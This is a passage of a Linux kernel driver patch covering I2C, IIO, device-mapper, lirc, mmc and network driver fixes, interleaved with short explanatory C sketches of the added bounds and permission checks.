+--- a/drivers/i2c/busses/i2c-qcom-geni.c
++++ b/drivers/i2c/busses/i2c-qcom-geni.c
+@@ -605,20 +605,20 @@ static int geni_i2c_gpi_xfer(struct geni_i2c_dev *gi2c, struct i2c_msg msgs[], i
+ 
+ 		peripheral.addr = msgs[i].addr;
+ 
++		ret =  geni_i2c_gpi(gi2c, &msgs[i], &config,
++				    &tx_addr, &tx_buf, I2C_WRITE, gi2c->tx_c);
++		if (ret)
++			goto err;
++
+ 		if (msgs[i].flags & I2C_M_RD) {
+ 			ret =  geni_i2c_gpi(gi2c, &msgs[i], &config,
+ 					    &rx_addr, &rx_buf, I2C_READ, gi2c->rx_c);
+ 			if (ret)
+ 				goto err;
+-		}
+-
+-		ret =  geni_i2c_gpi(gi2c, &msgs[i], &config,
+-				    &tx_addr, &tx_buf, I2C_WRITE, gi2c->tx_c);
+-		if (ret)
+-			goto err;
+ 
+-		if (msgs[i].flags & I2C_M_RD)
+ 			dma_async_issue_pending(gi2c->rx_c);
++		}
++
+ 		dma_async_issue_pending(gi2c->tx_c);
+ 
+ 		timeout = wait_for_completion_timeout(&gi2c->done, XFER_TIMEOUT);
+diff --git a/drivers/iio/accel/Kconfig b/drivers/iio/accel/Kconfig
+index ffac66db7ac92..1f34747a68bfe 100644
+--- a/drivers/iio/accel/Kconfig
++++ b/drivers/iio/accel/Kconfig
+@@ -219,10 +219,12 @@ config BMA400
+ 
+ config BMA400_I2C
+ 	tristate
++	select REGMAP_I2C
+ 	depends on BMA400
+ 
+ config BMA400_SPI
+ 	tristate
++	select REGMAP_SPI
+ 	depends on BMA400
+ 
+ config BMC150_ACCEL
+diff --git a/drivers/iio/imu/bno055/Kconfig b/drivers/iio/imu/bno055/Kconfig
+index 83e53acfbe880..c7f5866a177d9 100644
+--- a/drivers/iio/imu/bno055/Kconfig
++++ b/drivers/iio/imu/bno055/Kconfig
+@@ -8,6 +8,7 @@ config BOSCH_BNO055
+ config BOSCH_BNO055_SERIAL
+ 	tristate "Bosch BNO055 attached via UART"
+ 	depends on SERIAL_DEV_BUS
++	select REGMAP
+ 	select BOSCH_BNO055
+ 	help
+ 	  Enable this to support Bosch BNO055 IMUs attached via UART.
+diff --git a/drivers/iio/industrialio-core.c b/drivers/iio/industrialio-core.c
+index c9614982cb671..a2f8278f00856 100644
+--- a/drivers/iio/industrialio-core.c
++++ b/drivers/iio/industrialio-core.c
+@@ -1601,10 +1601,13 @@ static int iio_device_register_sysfs(struct iio_dev *indio_dev)
+ 	ret = iio_device_register_sysfs_group(indio_dev,
+ 					      &iio_dev_opaque->chan_attr_group);
+ 	if (ret)
+-		goto error_clear_attrs;
++		goto error_free_chan_attrs;
+ 
+ 	return 0;
+ 
++error_free_chan_attrs:
++	kfree(iio_dev_opaque->chan_attr_group.attrs);
++	iio_dev_opaque->chan_attr_group.attrs = NULL;
+ error_clear_attrs:
+ 	iio_free_chan_devattr_list(&iio_dev_opaque->channel_attr_list);
+ 
+diff --git a/drivers/iio/light/hid-sensor-als.c b/drivers/iio/light/hid-sensor-als.c
+index 5a1a625d8d16d..85097b769c209 100644
+--- a/drivers/iio/light/hid-sensor-als.c
++++ b/drivers/iio/light/hid-sensor-als.c
+@@ -228,6 +228,7 @@ static int als_capture_sample(struct hid_sensor_hub_device *hsdev,
+ 	case HID_USAGE_SENSOR_TIME_TIMESTAMP:
+ 		als_state->timestamp = hid_sensor_convert_timestamp(&als_state->common_attributes,
+ 								    *(s64 *)raw_data);
++		ret = 0;
+ 		break;
+ 	default:
+ 		break;
+diff --git a/drivers/iio/magnetometer/rm3100-core.c b/drivers/iio/magnetometer/rm3100-core.c
+index 69938204456f8..42b70cd42b393 100644
+--- a/drivers/iio/magnetometer/rm3100-core.c
++++ b/drivers/iio/magnetometer/rm3100-core.c
+@@ -530,6 +530,7 @@ int rm3100_common_probe(struct device *dev, struct regmap *regmap, int irq)
+ 	struct rm3100_data *data;
+ 	unsigned int tmp;
+ 	int ret;
++	int samp_rate_index;
+ 
+ 	indio_dev = devm_iio_device_alloc(dev, sizeof(*data));
+ 	if (!indio_dev)
+@@ -586,9 +587,14 @@ int rm3100_common_probe(struct device *dev, struct regmap *regmap, int irq)
+ 	ret = regmap_read(regmap, RM3100_REG_TMRC, &tmp);
+ 	if (ret < 0)
+ 		return ret;
++
++	samp_rate_index = tmp - RM3100_TMRC_OFFSET;
++	if (samp_rate_index < 0 || samp_rate_index >=  RM3100_SAMP_NUM) {
++		dev_err(dev, "The value read from RM3100_REG_TMRC is invalid!\n");
++		return -EINVAL;
++	}
+ 	/* Initializing max wait time, which is double conversion time. */
+-	data->conversion_time = rm3100_samp_rates[tmp - RM3100_TMRC_OFFSET][2]
+-				* 2;
++	data->conversion_time = rm3100_samp_rates[samp_rate_index][2] * 2;
+ 
+ 	/* Cycle count values may not be what we want. */
+ 	if ((tmp - RM3100_TMRC_OFFSET) == 0)
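+
+A minimal model of the range check introduced above: a value read back
+from hardware is validated before it indexes the sample-rate table.
+TMRC_OFFSET and SAMP_NUM below are illustrative stand-ins for the
+driver's RM3100_TMRC_OFFSET and RM3100_SAMP_NUM:
+
+    #include <stdio.h>
+
+    #define TMRC_OFFSET 0x92
+    #define SAMP_NUM    13
+
+    static int samp_rate_index(unsigned int tmrc)
+    {
+            int idx = (int)tmrc - TMRC_OFFSET;
+
+            if (idx < 0 || idx >= SAMP_NUM)
+                    return -1;      /* the driver returns -EINVAL here */
+            return idx;
+    }
+
+    int main(void)
+    {
+            printf("%d\n", samp_rate_index(0x95));  /* 3: in range */
+            printf("%d\n", samp_rate_index(0x10));  /* -1: register was garbage */
+            return 0;
+    }
+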
+diff --git a/drivers/infiniband/hw/irdma/verbs.c b/drivers/infiniband/hw/irdma/verbs.c
+index 4859b99d54fc2..01faec6ea5285 100644
+--- a/drivers/infiniband/hw/irdma/verbs.c
++++ b/drivers/infiniband/hw/irdma/verbs.c
+@@ -2845,6 +2845,13 @@ static struct ib_mr *irdma_reg_user_mr(struct ib_pd *pd, u64 start, u64 len,
+ 
+ 	switch (req.reg_type) {
+ 	case IRDMA_MEMREG_TYPE_QP:
++		/* iWarp: Catch page not starting on OS page boundary */
++		if (!rdma_protocol_roce(&iwdev->ibdev, 1) &&
++		    ib_umem_offset(iwmr->region)) {
++			err = -EINVAL;
++			goto error;
++		}
++
+ 		total = req.sq_pages + req.rq_pages + shadow_pgcnt;
+ 		if (total > iwmr->page_cnt) {
+ 			err = -EINVAL;
+diff --git a/drivers/interconnect/qcom/sc8180x.c b/drivers/interconnect/qcom/sc8180x.c
+index 83461e31774ec..d9ee193fb18bd 100644
+--- a/drivers/interconnect/qcom/sc8180x.c
++++ b/drivers/interconnect/qcom/sc8180x.c
+@@ -1387,6 +1387,7 @@ static struct qcom_icc_bcm bcm_mm0 = {
+ 
+ static struct qcom_icc_bcm bcm_co0 = {
+ 	.name = "CO0",
++	.keepalive = true,
+ 	.num_nodes = 1,
+ 	.nodes = { &slv_qns_cdsp_mem_noc }
+ };
+diff --git a/drivers/irqchip/irq-brcmstb-l2.c b/drivers/irqchip/irq-brcmstb-l2.c
+index 091b0fe7e3242..5d4421f75b43a 100644
+--- a/drivers/irqchip/irq-brcmstb-l2.c
++++ b/drivers/irqchip/irq-brcmstb-l2.c
+@@ -2,7 +2,7 @@
+ /*
+  * Generic Broadcom Set Top Box Level 2 Interrupt controller driver
+  *
+- * Copyright (C) 2014-2017 Broadcom
++ * Copyright (C) 2014-2024 Broadcom
+  */
+ 
+ #define pr_fmt(fmt)	KBUILD_MODNAME	": " fmt
+@@ -113,6 +113,9 @@ static void brcmstb_l2_intc_irq_handle(struct irq_desc *desc)
+ 		generic_handle_domain_irq(b->domain, irq);
+ 	} while (status);
+ out:
++	/* Don't ack parent before all device writes are done */
++	wmb();
++
+ 	chained_irq_exit(chip, desc);
+ }
+ 
+diff --git a/drivers/irqchip/irq-gic-v3-its.c b/drivers/irqchip/irq-gic-v3-its.c
+index 8956881503d9a..b83b39e93e1a9 100644
+--- a/drivers/irqchip/irq-gic-v3-its.c
++++ b/drivers/irqchip/irq-gic-v3-its.c
+@@ -3805,8 +3805,9 @@ static int its_vpe_set_affinity(struct irq_data *d,
+ 				bool force)
+ {
+ 	struct its_vpe *vpe = irq_data_get_irq_chip_data(d);
+-	int from, cpu = cpumask_first(mask_val);
++	struct cpumask common, *table_mask;
+ 	unsigned long flags;
++	int from, cpu;
+ 
+ 	/*
+ 	 * Changing affinity is mega expensive, so let's be as lazy as
+@@ -3822,19 +3823,22 @@ static int its_vpe_set_affinity(struct irq_data *d,
+ 	 * taken on any vLPI handling path that evaluates vpe->col_idx.
+ 	 */
+ 	from = vpe_to_cpuid_lock(vpe, &flags);
+-	if (from == cpu)
+-		goto out;
+-
+-	vpe->col_idx = cpu;
++	table_mask = gic_data_rdist_cpu(from)->vpe_table_mask;
+ 
+ 	/*
+-	 * GICv4.1 allows us to skip VMOVP if moving to a cpu whose RD
+-	 * is sharing its VPE table with the current one.
++	 * If we are offered another CPU in the same GICv4.1 ITS
++	 * affinity, pick this one. Otherwise, any CPU will do.
+ 	 */
+-	if (gic_data_rdist_cpu(cpu)->vpe_table_mask &&
+-	    cpumask_test_cpu(from, gic_data_rdist_cpu(cpu)->vpe_table_mask))
++	if (table_mask && cpumask_and(&common, mask_val, table_mask))
++		cpu = cpumask_test_cpu(from, &common) ? from : cpumask_first(&common);
++	else
++		cpu = cpumask_first(mask_val);
++
++	if (from == cpu)
+ 		goto out;
+ 
++	vpe->col_idx = cpu;
++
+ 	its_send_vmovp(vpe);
+ 	its_vpe_db_proxy_move(vpe, from, cpu);
+ 
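The its_vpe_set_affinity() hunk above changes how the target CPU is chosen: it intersects the requested affinity mask with the set of CPUs sharing the source redistributor's vPE table, and skips the move entirely when the current CPU qualifies. A simplified analogue using a 64-bit mask instead of struct cpumask (the helper is invented, and it assumes CPU numbers below 64):

#include <stdint.h>

/* Pick a target CPU the way the hunk above does: prefer a CPU that
 * shares the vPE table ("common"), and prefer not to move at all.
 * Assumes cpu indices < 64; returns -1 if 'requested' is empty. */
static int pick_target_cpu(uint64_t requested, uint64_t table_mask, int from)
{
	uint64_t common = requested & table_mask;

	if (!requested)
		return -1;
	if (common)
		return (common & (1ull << from)) ?
			from : __builtin_ctzll(common);
	return __builtin_ctzll(requested);
}
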
+diff --git a/drivers/irqchip/irq-loongson-eiointc.c b/drivers/irqchip/irq-loongson-eiointc.c
+index 3d99b8bdd8ef1..de115ee6e9ec7 100644
+--- a/drivers/irqchip/irq-loongson-eiointc.c
++++ b/drivers/irqchip/irq-loongson-eiointc.c
+@@ -242,7 +242,7 @@ static int eiointc_domain_alloc(struct irq_domain *domain, unsigned int virq,
+ 	int ret;
+ 	unsigned int i, type;
+ 	unsigned long hwirq = 0;
+-	struct eiointc *priv = domain->host_data;
++	struct eiointc_priv *priv = domain->host_data;
+ 
+ 	ret = irq_domain_translate_onecell(domain, arg, &hwirq, &type);
+ 	if (ret)
+diff --git a/drivers/md/dm-core.h b/drivers/md/dm-core.h
+index 71dcd8fd4050a..6314210d36971 100644
+--- a/drivers/md/dm-core.h
++++ b/drivers/md/dm-core.h
+@@ -21,6 +21,8 @@
+ #include "dm-ima.h"
+ 
+ #define DM_RESERVED_MAX_IOS		1024
++#define DM_MAX_TARGETS			1048576
++#define DM_MAX_TARGET_PARAMS		1024
+ 
+ struct dm_io;
+ 
+diff --git a/drivers/md/dm-crypt.c b/drivers/md/dm-crypt.c
+index ff515437d81e7..0e6068ee783e7 100644
+--- a/drivers/md/dm-crypt.c
++++ b/drivers/md/dm-crypt.c
+@@ -72,10 +72,8 @@ struct dm_crypt_io {
+ 	struct bio *base_bio;
+ 	u8 *integrity_metadata;
+ 	bool integrity_metadata_from_pool:1;
+-	bool in_tasklet:1;
+ 
+ 	struct work_struct work;
+-	struct tasklet_struct tasklet;
+ 
+ 	struct convert_context ctx;
+ 
+@@ -1729,7 +1727,6 @@ static void crypt_io_init(struct dm_crypt_io *io, struct crypt_config *cc,
+ 	io->ctx.r.req = NULL;
+ 	io->integrity_metadata = NULL;
+ 	io->integrity_metadata_from_pool = false;
+-	io->in_tasklet = false;
+ 	atomic_set(&io->io_pending, 0);
+ }
+ 
+@@ -1738,12 +1735,6 @@ static void crypt_inc_pending(struct dm_crypt_io *io)
+ 	atomic_inc(&io->io_pending);
+ }
+ 
+-static void kcryptd_io_bio_endio(struct work_struct *work)
+-{
+-	struct dm_crypt_io *io = container_of(work, struct dm_crypt_io, work);
+-	bio_endio(io->base_bio);
+-}
+-
+ /*
+  * One of the bios was finished. Check for completion of
+  * the whole request and correctly clean up the buffer.
+@@ -1767,20 +1758,6 @@ static void crypt_dec_pending(struct dm_crypt_io *io)
+ 
+ 	base_bio->bi_status = error;
+ 
+-	/*
+-	 * If we are running this function from our tasklet,
+-	 * we can't call bio_endio() here, because it will call
+-	 * clone_endio() from dm.c, which in turn will
+-	 * free the current struct dm_crypt_io structure with
+-	 * our tasklet. In this case we need to delay bio_endio()
+-	 * execution to after the tasklet is done and dequeued.
+-	 */
+-	if (io->in_tasklet) {
+-		INIT_WORK(&io->work, kcryptd_io_bio_endio);
+-		queue_work(cc->io_queue, &io->work);
+-		return;
+-	}
+-
+ 	bio_endio(base_bio);
+ }
+ 
+@@ -2213,11 +2190,6 @@ static void kcryptd_crypt(struct work_struct *work)
+ 		kcryptd_crypt_write_convert(io);
+ }
+ 
+-static void kcryptd_crypt_tasklet(unsigned long work)
+-{
+-	kcryptd_crypt((struct work_struct *)work);
+-}
+-
+ static void kcryptd_queue_crypt(struct dm_crypt_io *io)
+ {
+ 	struct crypt_config *cc = io->cc;
+@@ -2229,15 +2201,10 @@ static void kcryptd_queue_crypt(struct dm_crypt_io *io)
+ 		 * irqs_disabled(): the kernel may run some IO completion from the idle thread, but
+ 		 * it is being executed with irqs disabled.
+ 		 */
+-		if (in_hardirq() || irqs_disabled()) {
+-			io->in_tasklet = true;
+-			tasklet_init(&io->tasklet, kcryptd_crypt_tasklet, (unsigned long)&io->work);
+-			tasklet_schedule(&io->tasklet);
++		if (!(in_hardirq() || irqs_disabled())) {
++			kcryptd_crypt(&io->work);
+ 			return;
+ 		}
+-
+-		kcryptd_crypt(&io->work);
+-		return;
+ 	}
+ 
+ 	INIT_WORK(&io->work, kcryptd_crypt);
+diff --git a/drivers/md/dm-ioctl.c b/drivers/md/dm-ioctl.c
+index 206e6ce554dc7..4376754816abe 100644
+--- a/drivers/md/dm-ioctl.c
++++ b/drivers/md/dm-ioctl.c
+@@ -1877,7 +1877,8 @@ static int copy_params(struct dm_ioctl __user *user, struct dm_ioctl *param_kern
+ 			   minimum_data_size - sizeof(param_kernel->version)))
+ 		return -EFAULT;
+ 
+-	if (param_kernel->data_size < minimum_data_size) {
++	if (unlikely(param_kernel->data_size < minimum_data_size) ||
++	    unlikely(param_kernel->data_size > DM_MAX_TARGETS * DM_MAX_TARGET_PARAMS)) {
+ 		DMERR("Invalid data size in the ioctl structure: %u",
+ 		      param_kernel->data_size);
+ 		return -EINVAL;
+diff --git a/drivers/md/dm-table.c b/drivers/md/dm-table.c
+index dac6a5f25f2be..e0367a672eabf 100644
+--- a/drivers/md/dm-table.c
++++ b/drivers/md/dm-table.c
+@@ -128,7 +128,12 @@ static int alloc_targets(struct dm_table *t, unsigned int num)
+ int dm_table_create(struct dm_table **result, fmode_t mode,
+ 		    unsigned int num_targets, struct mapped_device *md)
+ {
+-	struct dm_table *t = kzalloc(sizeof(*t), GFP_KERNEL);
++	struct dm_table *t;
++
++	if (num_targets > DM_MAX_TARGETS)
++		return -EOVERFLOW;
++
++	t = kzalloc(sizeof(*t), GFP_KERNEL);
+ 
+ 	if (!t)
+ 		return -ENOMEM;
+@@ -143,7 +148,7 @@ int dm_table_create(struct dm_table **result, fmode_t mode,
+ 
+ 	if (!num_targets) {
+ 		kfree(t);
+-		return -ENOMEM;
++		return -EOVERFLOW;
+ 	}
+ 
+ 	if (alloc_targets(t, num_targets)) {
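The dm-ioctl and dm-table hunks above put hard caps on user-controlled sizes before they reach the allocator. The shape of that check, reduced to a standalone user-space sketch (the struct and helper are invented for illustration):

#include <errno.h>
#include <stdint.h>
#include <stdlib.h>

#define MAX_TARGETS		1048576u	/* mirrors DM_MAX_TARGETS */
#define MAX_TARGET_PARAMS	1024u		/* mirrors DM_MAX_TARGET_PARAMS */

struct target { uint64_t begin, len; };

/* Refuse absurd, user-controlled counts up front instead of letting
 * them turn into a huge (and failing) allocation. */
static struct target *alloc_targets(uint32_t num, int *err)
{
	if (num == 0 || num > MAX_TARGETS) {
		*err = -EOVERFLOW;
		return NULL;
	}
	*err = 0;
	return calloc(num, sizeof(struct target));
}
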
+diff --git a/drivers/md/dm-verity-target.c b/drivers/md/dm-verity-target.c
+index 24df610a2c438..4669923f4cfb4 100644
+--- a/drivers/md/dm-verity-target.c
++++ b/drivers/md/dm-verity-target.c
+@@ -634,23 +634,6 @@ static void verity_work(struct work_struct *w)
+ 	verity_finish_io(io, errno_to_blk_status(verity_verify_io(io)));
+ }
+ 
+-static void verity_tasklet(unsigned long data)
+-{
+-	struct dm_verity_io *io = (struct dm_verity_io *)data;
+-	int err;
+-
+-	io->in_tasklet = true;
+-	err = verity_verify_io(io);
+-	if (err == -EAGAIN || err == -ENOMEM) {
+-		/* fallback to retrying with work-queue */
+-		INIT_WORK(&io->work, verity_work);
+-		queue_work(io->v->verify_wq, &io->work);
+-		return;
+-	}
+-
+-	verity_finish_io(io, errno_to_blk_status(err));
+-}
+-
+ static void verity_end_io(struct bio *bio)
+ {
+ 	struct dm_verity_io *io = bio->bi_private;
+@@ -663,13 +646,8 @@ static void verity_end_io(struct bio *bio)
+ 		return;
+ 	}
+ 
+-	if (static_branch_unlikely(&use_tasklet_enabled) && io->v->use_tasklet) {
+-		tasklet_init(&io->tasklet, verity_tasklet, (unsigned long)io);
+-		tasklet_schedule(&io->tasklet);
+-	} else {
+-		INIT_WORK(&io->work, verity_work);
+-		queue_work(io->v->verify_wq, &io->work);
+-	}
++	INIT_WORK(&io->work, verity_work);
++	queue_work(io->v->verify_wq, &io->work);
+ }
+ 
+ /*
+diff --git a/drivers/md/dm-verity.h b/drivers/md/dm-verity.h
+index f9d522c870e61..f3f6070084196 100644
+--- a/drivers/md/dm-verity.h
++++ b/drivers/md/dm-verity.h
+@@ -83,7 +83,6 @@ struct dm_verity_io {
+ 	struct bvec_iter iter;
+ 
+ 	struct work_struct work;
+-	struct tasklet_struct tasklet;
+ 
+ 	/*
+ 	 * Three variably-sized fields follow this struct:
+diff --git a/drivers/md/md.c b/drivers/md/md.c
+index 3ccf1920682cb..c7efe15229514 100644
+--- a/drivers/md/md.c
++++ b/drivers/md/md.c
+@@ -963,9 +963,10 @@ void md_super_write(struct mddev *mddev, struct md_rdev *rdev,
+ 		return;
+ 
+ 	bio = bio_alloc_bioset(rdev->meta_bdev ? rdev->meta_bdev : rdev->bdev,
+-			       1,
+-			       REQ_OP_WRITE | REQ_SYNC | REQ_PREFLUSH | REQ_FUA,
+-			       GFP_NOIO, &mddev->sync_set);
++			      1,
++			      REQ_OP_WRITE | REQ_SYNC | REQ_IDLE | REQ_META
++				  | REQ_PREFLUSH | REQ_FUA,
++			      GFP_NOIO, &mddev->sync_set);
+ 
+ 	atomic_inc(&rdev->nr_pending);
+ 
+diff --git a/drivers/media/platform/rockchip/rkisp1/rkisp1-dev.c b/drivers/media/platform/rockchip/rkisp1/rkisp1-dev.c
+index aeb6bb63667eb..41abb18b00acb 100644
+--- a/drivers/media/platform/rockchip/rkisp1/rkisp1-dev.c
++++ b/drivers/media/platform/rockchip/rkisp1/rkisp1-dev.c
+@@ -559,7 +559,7 @@ static int rkisp1_probe(struct platform_device *pdev)
+ 				rkisp1->irqs[il] = irq;
+ 		}
+ 
+-		ret = devm_request_irq(dev, irq, info->isrs[i].isr, 0,
++		ret = devm_request_irq(dev, irq, info->isrs[i].isr, IRQF_SHARED,
+ 				       dev_driver_string(dev), dev);
+ 		if (ret) {
+ 			dev_err(dev, "request irq failed: %d\n", ret);
+diff --git a/drivers/media/rc/bpf-lirc.c b/drivers/media/rc/bpf-lirc.c
+index fe17c7f98e810..52d82cbe7685f 100644
+--- a/drivers/media/rc/bpf-lirc.c
++++ b/drivers/media/rc/bpf-lirc.c
+@@ -253,7 +253,7 @@ int lirc_prog_attach(const union bpf_attr *attr, struct bpf_prog *prog)
+ 	if (attr->attach_flags)
+ 		return -EINVAL;
+ 
+-	rcdev = rc_dev_get_from_fd(attr->target_fd);
++	rcdev = rc_dev_get_from_fd(attr->target_fd, true);
+ 	if (IS_ERR(rcdev))
+ 		return PTR_ERR(rcdev);
+ 
+@@ -278,7 +278,7 @@ int lirc_prog_detach(const union bpf_attr *attr)
+ 	if (IS_ERR(prog))
+ 		return PTR_ERR(prog);
+ 
+-	rcdev = rc_dev_get_from_fd(attr->target_fd);
++	rcdev = rc_dev_get_from_fd(attr->target_fd, true);
+ 	if (IS_ERR(rcdev)) {
+ 		bpf_prog_put(prog);
+ 		return PTR_ERR(rcdev);
+@@ -303,7 +303,7 @@ int lirc_prog_query(const union bpf_attr *attr, union bpf_attr __user *uattr)
+ 	if (attr->query.query_flags)
+ 		return -EINVAL;
+ 
+-	rcdev = rc_dev_get_from_fd(attr->query.target_fd);
++	rcdev = rc_dev_get_from_fd(attr->query.target_fd, false);
+ 	if (IS_ERR(rcdev))
+ 		return PTR_ERR(rcdev);
+ 
+diff --git a/drivers/media/rc/ir_toy.c b/drivers/media/rc/ir_toy.c
+index 1968067092594..69e630d85262f 100644
+--- a/drivers/media/rc/ir_toy.c
++++ b/drivers/media/rc/ir_toy.c
+@@ -332,6 +332,7 @@ static int irtoy_tx(struct rc_dev *rc, uint *txbuf, uint count)
+ 			    sizeof(COMMAND_SMODE_EXIT), STATE_COMMAND_NO_RESP);
+ 	if (err) {
+ 		dev_err(irtoy->dev, "exit sample mode: %d\n", err);
++		kfree(buf);
+ 		return err;
+ 	}
+ 
+@@ -339,6 +340,7 @@ static int irtoy_tx(struct rc_dev *rc, uint *txbuf, uint count)
+ 			    sizeof(COMMAND_SMODE_ENTER), STATE_COMMAND);
+ 	if (err) {
+ 		dev_err(irtoy->dev, "enter sample mode: %d\n", err);
++		kfree(buf);
+ 		return err;
+ 	}
+ 
+diff --git a/drivers/media/rc/lirc_dev.c b/drivers/media/rc/lirc_dev.c
+index 184e0b35744f3..adb8c794a2d7b 100644
+--- a/drivers/media/rc/lirc_dev.c
++++ b/drivers/media/rc/lirc_dev.c
+@@ -814,7 +814,7 @@ void __exit lirc_dev_exit(void)
+ 	unregister_chrdev_region(lirc_base_dev, RC_DEV_MAX);
+ }
+ 
+-struct rc_dev *rc_dev_get_from_fd(int fd)
++struct rc_dev *rc_dev_get_from_fd(int fd, bool write)
+ {
+ 	struct fd f = fdget(fd);
+ 	struct lirc_fh *fh;
+@@ -828,6 +828,9 @@ struct rc_dev *rc_dev_get_from_fd(int fd)
+ 		return ERR_PTR(-EINVAL);
+ 	}
+ 
++	if (write && !(f.file->f_mode & FMODE_WRITE))
++		return ERR_PTR(-EPERM);
++
+ 	fh = f.file->private_data;
+ 	dev = fh->rc;
+ 
+diff --git a/drivers/media/rc/rc-core-priv.h b/drivers/media/rc/rc-core-priv.h
+index ef1e95e1af7fc..7df949fc65e2b 100644
+--- a/drivers/media/rc/rc-core-priv.h
++++ b/drivers/media/rc/rc-core-priv.h
+@@ -325,7 +325,7 @@ void lirc_raw_event(struct rc_dev *dev, struct ir_raw_event ev);
+ void lirc_scancode_event(struct rc_dev *dev, struct lirc_scancode *lsc);
+ int lirc_register(struct rc_dev *dev);
+ void lirc_unregister(struct rc_dev *dev);
+-struct rc_dev *rc_dev_get_from_fd(int fd);
++struct rc_dev *rc_dev_get_from_fd(int fd, bool write);
+ #else
+ static inline int lirc_dev_init(void) { return 0; }
+ static inline void lirc_dev_exit(void) {}
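The lirc change above threads a 'write' flag through rc_dev_get_from_fd() so that BPF attach/detach requires a descriptor opened for writing, while query does not. A user-space analogue of that permission gate (hypothetical helper, not a kernel or lirc API):

#include <errno.h>
#include <fcntl.h>

/* Fail unless 'fd' was opened writable; read-only callers may still
 * query, mirroring the FMODE_WRITE test added above. */
static int require_writable_fd(int fd)
{
	int flags = fcntl(fd, F_GETFL);

	if (flags < 0)
		return -errno;
	if ((flags & O_ACCMODE) == O_RDONLY)
		return -EPERM;
	return 0;
}
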
+diff --git a/drivers/misc/fastrpc.c b/drivers/misc/fastrpc.c
+index cc57cc8204328..69cc24962706c 100644
+--- a/drivers/misc/fastrpc.c
++++ b/drivers/misc/fastrpc.c
+@@ -1990,7 +1990,7 @@ static int fastrpc_cb_remove(struct platform_device *pdev)
+ 	int i;
+ 
+ 	spin_lock_irqsave(&cctx->lock, flags);
+-	for (i = 1; i < FASTRPC_MAX_SESSIONS; i++) {
++	for (i = 0; i < FASTRPC_MAX_SESSIONS; i++) {
+ 		if (cctx->session[i].sid == sess->sid) {
+ 			cctx->session[i].valid = false;
+ 			cctx->sesscount--;
+diff --git a/drivers/mmc/core/slot-gpio.c b/drivers/mmc/core/slot-gpio.c
+index dd2a4b6ab6adb..e3c69c6b85a6c 100644
+--- a/drivers/mmc/core/slot-gpio.c
++++ b/drivers/mmc/core/slot-gpio.c
+@@ -62,11 +62,15 @@ int mmc_gpio_alloc(struct mmc_host *host)
+ int mmc_gpio_get_ro(struct mmc_host *host)
+ {
+ 	struct mmc_gpio *ctx = host->slot.handler_priv;
++	int cansleep;
+ 
+ 	if (!ctx || !ctx->ro_gpio)
+ 		return -ENOSYS;
+ 
+-	return gpiod_get_value_cansleep(ctx->ro_gpio);
++	cansleep = gpiod_cansleep(ctx->ro_gpio);
++	return cansleep ?
++		gpiod_get_value_cansleep(ctx->ro_gpio) :
++		gpiod_get_value(ctx->ro_gpio);
+ }
+ EXPORT_SYMBOL(mmc_gpio_get_ro);
+ 
+diff --git a/drivers/mmc/host/sdhci-pci-o2micro.c b/drivers/mmc/host/sdhci-pci-o2micro.c
+index bca1d095b7597..24bb0e9809e76 100644
+--- a/drivers/mmc/host/sdhci-pci-o2micro.c
++++ b/drivers/mmc/host/sdhci-pci-o2micro.c
+@@ -602,6 +602,35 @@ static void sdhci_pci_o2_set_clock(struct sdhci_host *host, unsigned int clock)
+ 	sdhci_o2_enable_clk(host, clk);
+ }
+ 
++static void sdhci_pci_o2_set_power(struct sdhci_host *host, unsigned char mode, unsigned short vdd)
++{
++	struct sdhci_pci_chip *chip;
++	struct sdhci_pci_slot *slot = sdhci_priv(host);
++	u32 scratch_32 = 0;
++	u8 scratch_8 = 0;
++
++	chip = slot->chip;
++
++	if (mode == MMC_POWER_OFF) {
++		/* UnLock WP */
++		pci_read_config_byte(chip->pdev, O2_SD_LOCK_WP, &scratch_8);
++		scratch_8 &= 0x7f;
++		pci_write_config_byte(chip->pdev, O2_SD_LOCK_WP, scratch_8);
++
++		/* Set PCR 0x354[16] to switch Clock Source back to OPE Clock */
++		pci_read_config_dword(chip->pdev, O2_SD_OUTPUT_CLK_SOURCE_SWITCH, &scratch_32);
++		scratch_32 &= ~(O2_SD_SEL_DLL);
++		pci_write_config_dword(chip->pdev, O2_SD_OUTPUT_CLK_SOURCE_SWITCH, scratch_32);
++
++		/* Lock WP */
++		pci_read_config_byte(chip->pdev, O2_SD_LOCK_WP, &scratch_8);
++		scratch_8 |= 0x80;
++		pci_write_config_byte(chip->pdev, O2_SD_LOCK_WP, scratch_8);
++	}
++
++	sdhci_set_power(host, mode, vdd);
++}
++
+ static int sdhci_pci_o2_probe_slot(struct sdhci_pci_slot *slot)
+ {
+ 	struct sdhci_pci_chip *chip;
+@@ -911,6 +940,7 @@ static const struct sdhci_ops sdhci_pci_o2_ops = {
+ 	.set_bus_width = sdhci_set_bus_width,
+ 	.reset = sdhci_reset,
+ 	.set_uhs_signaling = sdhci_set_uhs_signaling,
++	.set_power = sdhci_pci_o2_set_power,
+ };
+ 
+ const struct sdhci_pci_fixes sdhci_o2 = {
+diff --git a/drivers/net/can/dev/netlink.c b/drivers/net/can/dev/netlink.c
+index 8efa22d9f214d..053d375eae4f5 100644
+--- a/drivers/net/can/dev/netlink.c
++++ b/drivers/net/can/dev/netlink.c
+@@ -311,7 +311,7 @@ static int can_changelink(struct net_device *dev, struct nlattr *tb[],
+ 			/* Neither of TDC parameters nor TDC flags are
+ 			 * provided: do calculation
+ 			 */
+-			can_calc_tdco(&priv->tdc, priv->tdc_const, &priv->data_bittiming,
++			can_calc_tdco(&priv->tdc, priv->tdc_const, &dbt,
+ 				      &priv->ctrlmode, priv->ctrlmode_supported);
+ 		} /* else: both CAN_CTRLMODE_TDC_{AUTO,MANUAL} are explicitly
+ 		   * turned off. TDC is disabled: do nothing
+diff --git a/drivers/net/ethernet/intel/i40e/i40e_main.c b/drivers/net/ethernet/intel/i40e/i40e_main.c
+index 63d43ef86f9b9..76455405a6d8e 100644
+--- a/drivers/net/ethernet/intel/i40e/i40e_main.c
++++ b/drivers/net/ethernet/intel/i40e/i40e_main.c
+@@ -5333,7 +5333,7 @@ static int i40e_pf_wait_queues_disabled(struct i40e_pf *pf)
+ {
+ 	int v, ret = 0;
+ 
+-	for (v = 0; v < pf->hw.func_caps.num_vsis; v++) {
++	for (v = 0; v < pf->num_alloc_vsi; v++) {
+ 		if (pf->vsi[v]) {
+ 			ret = i40e_vsi_wait_queues_disabled(pf->vsi[v]);
+ 			if (ret)
+diff --git a/drivers/net/ethernet/intel/i40e/i40e_virtchnl_pf.c b/drivers/net/ethernet/intel/i40e/i40e_virtchnl_pf.c
+index 3d3db58090ed1..ed4be80fec2a5 100644
